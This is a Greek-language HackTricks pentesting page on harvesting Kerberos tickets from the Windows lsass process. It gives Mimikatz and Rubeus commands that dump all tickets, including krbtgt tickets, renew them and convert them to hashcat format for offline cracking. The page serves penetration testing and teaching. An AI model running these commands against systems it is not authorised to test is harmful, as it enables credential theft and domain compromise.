hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
Translator workflow 35c6b081d2 Translated to Greek
2024-02-10 22:40:18 +00:00

6.3 KiB
Raw Blame History

Συλλογή εισιτηρίων από τα Windows

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι υποστήριξης του HackTricks:

Τα εισιτήρια στα Windows διαχειρίζονται και αποθηκεύονται από τη διεργασία lsass (Local Security Authority Subsystem Service), η οποία είναι υπεύθυνη για την χειρισμό των πολιτικών ασφαλείας. Για να εξαχθούν αυτά τα εισιτήρια, είναι απαραίτητο να αλληλεπιδράσετε με τη διεργασία lsass. Ένας μη-διαχειριστικός χρήστης μπορεί να έχει πρόσβαση μόνο στα δικά του εισιτήρια, ενώ ένας διαχειριστής έχει την προνομιούχα δυνατότητα να εξάγει όλα τα εισιτήρια στο σύστημα. Για τέτοιες λειτουργίες, χρησιμοποιούνται ευρέως τα εργαλεία Mimikatz και Rubeus, τα οποία προσφέρουν διάφορες εντολές και λειτουργίες.

Mimikatz

Το Mimikatz είναι ένα ευέλικτο εργαλείο που μπορεί να αλληλεπιδράσει με την ασφάλεια των Windows. Χρησιμοποιείται όχι μόνο για την εξαγωγή εισιτηρίων, αλλά και για διάφορες άλλες λειτουργίες που σχετίζονται με την ασφάλεια.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Το Rubeus είναι ένα εργαλείο που έχει σχεδιαστεί ειδικά για την αλληλεπίδραση και την αλλαγή του Kerberos. Χρησιμοποιείται για την εξαγωγή και την διαχείριση εισιτηρίων, καθώς και για άλλες δραστηριότητες που σχετίζονται με το Kerberos.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Όταν χρησιμοποιείτε αυτές τις εντολές, βεβαιωθείτε ότι αντικαθιστάτε τις θέσεις κράτησης όπως <BASE64_TICKET> και <luid> με το πραγματικό κωδικοποιημένο Base64 εισιτήριο και το αναγνωριστικό σύνδεσης (Logon ID) αντίστοιχα. Αυτά τα εργαλεία παρέχουν εκτεταμένη λειτουργικότητα για τη διαχείριση εισιτηρίων και την αλληλεπίδραση με τους μηχανισμούς ασφαλείας των Windows.

Αναφορές

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks: